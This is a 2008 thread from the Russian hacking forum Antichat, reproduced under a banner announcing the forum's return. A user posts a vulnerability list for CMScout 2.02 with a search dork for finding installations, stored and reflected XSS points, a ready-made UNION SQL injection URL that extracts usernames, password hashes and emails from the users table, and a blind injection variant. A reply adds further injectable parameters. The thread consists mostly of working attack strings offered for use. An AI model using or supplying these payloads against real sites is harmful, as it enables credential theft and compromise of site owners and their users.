Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
03.03.2008, 04:29
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
CMScout
CMScout
Site: http://cmscout.co.za
Version: 2.02
Dork: "Powered by CMScout"
Active XSS:CMScout 2.02 forums >> Test Forum >> New TopicУязвимые поля: "Subject", "Description" User Control Panel >> ProfileУязвимые поля: "First Name", "Last Name", "Contributions" CMScout Administration
Download Manager
Уязвимые поля: "Name" Photo Album Manager Уязвимые поля: "Name" Passive XSS
Код:
/index.php?page=forums&f=1&menuid=3[xss]
Remote SQL Injection:
Код:
/admin.php?page=users&subpage=users_view&id=-1+union+select+1,2,concat_ws(0x3a,uname,passwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+cms_users/*
Нету вывода - забираем данные посимвольно.
Код:
/admin.php?page=group&action=auth&id=1+and+substring(version(),1,1)=5/*
Чтобы узнать полный путь к сайту, можно, как вариант посмотреть логи:
CMScout Administration >> Logfile viewer
(с) ZAMUT
Последний раз редактировалось ZAMUT; 12.07.2008 в 15:57..
|
|
|
04.03.2008, 18:44
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
скули не в админке ( а нафик в админке они собственно нужны?) )
Код:
/index.php?page=polls&id=[sql]&menuid=0
Код:
/getphoto.php?pic=[sql] - посимвольная, либо more one row
там вообще еще куча багов, кто хочет тот найдет. в том числе и php inj
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
